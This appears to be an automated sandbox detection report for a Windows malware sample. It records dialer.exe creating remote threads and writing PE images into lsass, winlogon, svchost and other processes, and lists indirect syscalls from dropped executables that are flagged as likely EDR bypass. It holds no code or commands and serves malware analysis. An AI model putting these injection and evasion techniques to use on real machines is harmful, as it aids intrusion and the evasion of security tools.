Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2A12273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8C5273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\conhost.exe EIP: 80AF273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: CD43273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D471273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8011273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8046273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 983C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 534D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 959273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 95F273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: B569273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: B9AD273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: B9F2273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D684273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D68A273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\conhost.exe EIP: D745273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D0C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 16E3273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 174B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FEF2273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6D15273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6D90273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: EE9C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: EEA2273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E2BB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2BBF273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F37C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F662273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8EA4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A8D4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4DF273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\Conhost.exe EIP: 619D273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\Conhost.exe EIP: 6F7C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 170E273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E0B1273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1788273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E2A2273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 129D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 9B3273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 12E2273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 23EA273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5E01273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 39E0273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 3C5B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 896B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A3A2273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2845273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\Conhost.exe EIP: E731273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 821D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 157273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 9BE3273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 452273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 9BE6273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C632273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 9A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 95273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 90EB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 90EE273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 693E273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 98273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 36E273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 91DB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E4C9273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 73C2273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E50F273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 73F7273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\Conhost.exe EIP: C601273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 64D2273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 3BB2273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6507273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 3DD4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 66E6273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2713273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 671C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 292B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C8BF273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: DB60273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C939273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: DBA2273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: B6C2273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A5A8273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F753273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A823273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8A95273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: B332273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: B597273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4986273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4BAD273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C732273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\Conhost.exe EIP: A7AC273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: ABDC273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C528273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C823273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 84C7273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 86CD273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: CA14273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 48F2273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 18C5273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 50AF273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 50B5273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C929273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C960273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 39A5273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 39DC273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F7E0273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 9125273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F9BE273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F9CE273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\Conhost.exe EIP: 4D38273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FCAF273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4112273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FCE5273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 3DE2273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\Conhost.exe EIP: 5551273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4148273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 3FE9273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A97D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7132273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A9F7273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 732F273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FF1273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 51D5273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1026273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6C07273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\Conhost.exe EIP: 6EA0273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7C5D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 573B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4F9C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 596B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5008273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E1AA273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E369273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4A49273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 9E6C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4AB1273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: DED3273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: DED6273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4DF0273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D08C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A7FC273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: AA77273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6CC0273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6E8F273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1B27273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 3FF5273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E018273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 9BA5273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2967273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A8DD273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 34D2273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2A3B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6FE6273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2C2E273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 71D9273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C7AC273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C7A9273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1876273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C820273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 9096273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: DA2A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: EC70273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: EC7A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: DF15273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F0A4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6B7C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7A1B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A721273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A724273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: EDE0273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: AE2E273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: AFE2273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 195A273C

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\ProgramData\dhjhauemqxxg\covxzxzipzly.exe	NtQuerySystemInformation: Indirect: 0x7FF60271D2F3
Source: C:\ProgramData\dhjhauemqxxg\covxzxzipzly.exe	NtQuerySystemInformation: Indirect: 0x7FF602742FEF
Source: C:\ProgramData\dhjhauemqxxg\covxzxzipzly.exe	NtQueryInformationProcess: Indirect: 0x7FF602754942
Source: C:\ProgramData\dhjhauemqxxg\covxzxzipzly.exe	NtQueryInformationProcess: Indirect: 0x7FF6027547F2
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	NtQueryInformationProcess: Indirect: 0x7FF6E02F47F2
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	NtQueryInformationProcess: Indirect: 0x7FF6E02F4942
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	NtQuerySystemInformation: Indirect: 0x7FF6E02E2FEF
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	NtQuerySystemInformation: Indirect: 0x7FF6E02BD2F3

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Memory written: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 20E8FA70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 26AB5E60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 206DF360000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 194DEAB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 156CB0E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB419A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 223389C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2790E940000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26823210000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe base: 20A72460000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 25E7D550000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20ACF3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 292067A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CABD5B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe base: 25A301A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe base: 1F7B8460000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C680BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24132C70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2268A640000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D8FCA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 19AE6140000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B014100000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20F951A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 203807B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2CA9DAD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1689C5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F2DF1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C41A000000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17A5B3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: E70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1810BEE0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21223F40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E6C0450000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2069B4F0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23614180000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B160CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2CF47BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 129874A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2095DE80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\igcc_dch.inf_amd64_78ff17a5ea060c5f\OneApp.IGCC.WinService.exe base: 140522E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 186835B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\dal.inf_amd64_ffc75848a6342fdf\jhi_service.exe base: 22A472B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 204DA710000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 207C2110000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2607AF00000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 179C7BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 24897EE0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22C945A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe base: 12B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C5899C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 18777E80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C51FC00000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 27A20940000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1C37A930000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: C40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxEM.exe base: 1CACBE80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D7DB700000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1FE81D60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 226DDF60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\SettingSyncHost.exe base: 1F061FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 232A8500000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1EFC4010000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe base: 850000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 285BFF90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B840A80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 14947DE0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 12619020000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1AE52AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1C91BC20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FA1FC50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1817F790000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B2FE700000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1750EDC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2CF98D00000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AF70FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2322DD90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1D6B2210000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1ED589B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 12B0AF80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2910F680000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1E202150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 284015A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 28559EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 23ED0700000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1A52A120000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1FA08C50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 19F80AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Local\Temp\1073975001\WveK4j1.exe base: 1A3CD430000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 2A4D4710000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1D780110000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1D780460000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 2AE983C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 17B534D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E709590000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E7095F0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 28CB5690000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 260B9AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 260B9F20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 217D6840000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 217D68A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1B6D7450000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 28C0D0C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1C916E30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1C9174B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1F5AE890000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 27FFEF20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E86D150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E86D900000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1B3EE9C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1B3EEA20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E7E2BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 25433C40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 2162BBF0000 value starts with: 4D5A
